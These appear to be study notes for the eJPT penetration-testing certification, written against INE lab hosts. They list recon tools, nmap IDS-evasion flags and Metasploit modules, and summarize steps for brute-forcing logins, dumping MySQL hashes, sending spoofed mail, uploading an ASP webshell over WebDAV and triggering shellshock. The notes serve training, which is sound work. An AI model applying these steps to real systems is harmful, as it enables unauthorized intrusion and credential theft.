Enumeration

Information Gathering

  • Passive: whois, whatweb, dnsrecon, wafw00f, sublist3r, google dorks, theharvester
  • Active: dns zone transfer, nmap

Footprinting & Scanning

  • basic osi layer stuff networking
  • nmap commands
    • sn for ping sweep
    • scan common ports first for faster results, like -P22,23,80,443,3389
  • Firewall detection & IDS evasion
    • using malformed packets
    • fragment packets with -f (MTU)
    • optimising nmap with -T4
    • nmap output formats
    • sometimes it makes sense to slow down scans, preventing IDS from detecting
    • -D to set decoy ip addresses
    • output -oN normal, -oX xml for metasploit, -oG grepable format

Enumeration

  • host discovery
    • using the -sV option
  • import nmap into msf
    • using the db_import and db_nmap
  • msf auxiliary modules using search
  • steps to exploit
    • nmap, scan services, check for msf exploits
  • pivot to another subnet using msf
    • enter shell, use ip addr to look for next subnet
    • use run autoroute -s 192.180.108.2
    • use portscan tcp to scan the next subnet, set ports to 1-1000
    • use sessions -i 1 to switch between sessions
    • use upload /root/static-binaries/nmap /tmp/nmap to upload payloads
  • ftp enumeration
    • two msf modules, ftp_version and ftp_login
    • for ftp_login, you can set a USER_FILE and PASS_FILE
  • smb enumeration
    • using nmap, nmap --script smb-os-discovery.nse -p 445
    • msf modules like smb_version
    • get netbios name of samba nmblookup -A demo.ine.local
    • list shares smbclient -L demo.ine.local -N
    • anonymous samba connection rpcclient -U "" -N demo.ine.local
  • apache enumeration
    • using msf modules like http_version, robots_txt, http_header, brute_dirs, dir_scanner, dir_listing, files_dir, http_put, apache_userdir_enum
  • mysql enumeration
    • using msf modules like mysql_version, mysql_login, mysql_enum, mysql_sql, mysql_file_enum, mysql_hashdump (one credentials can dump all password hashes), mysql_schemadump, mysql_writable_dirs
  • ssh enumeration
    • using msf modules like ssh_version
    • ssh bruteforce using msf module ssh_login
  • smtp enumeration
    • connect to the server using netcat and telnet
    • using smtp-user-enum -U usernames.txt -t demo.ine.local
    • msf module smtp_enum, get usernames
    • -f admin@attacker.xyz -t root@openmailbox.xyz -s demo.ine.local -u Fakemail -m "Hi root, a fake from admin" -o tls=no command to send email

Vulnerability Assessment

  • webdav, iis server davtest
    • webdav is a file management tool
    • testing anonymous connection, davtest -url http://demo.ine.local/webdav
    • testing password login, davtest -auth bob:password_123321 -url http://demo.ine.local/webdav
    • actual logging in cadaver http://demo.ine.local/webdav and use put /usr/share/webshells/asp/webshell.asp to upload payload
    • code execution using http://demo.ine.local/webdav/webshell.asp?cmd=whoami after uploading payload
  • shellshock
    • shellshock is an RCE vulnerability caused by bash environmental variables
    • look for a cgi file in the website source code
    • check for shellshock vulnerability using nmap and the cgi file nmap --script http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" demo.ine.local
    • steps to exploit is on github https://github.com/opsxcq/exploit-CVE-2014-6271
    • capture the network traffic, send to repeater and replace the user-agent header with the payload
  • wmap web app scan
    • its a plugin in msf, can be loaded using load wmap
    • add the target (both ip and url) using wmap_sites -a 192.157.89.3 and wmap_targets -t http://192.157.89.3, check added sites with wmap_sites -l and wmap_targets -l
    • start the scan with wmap_run -t and use enabled modules with wmap_run -e
ejpt

Written By

GitHub Contributor Team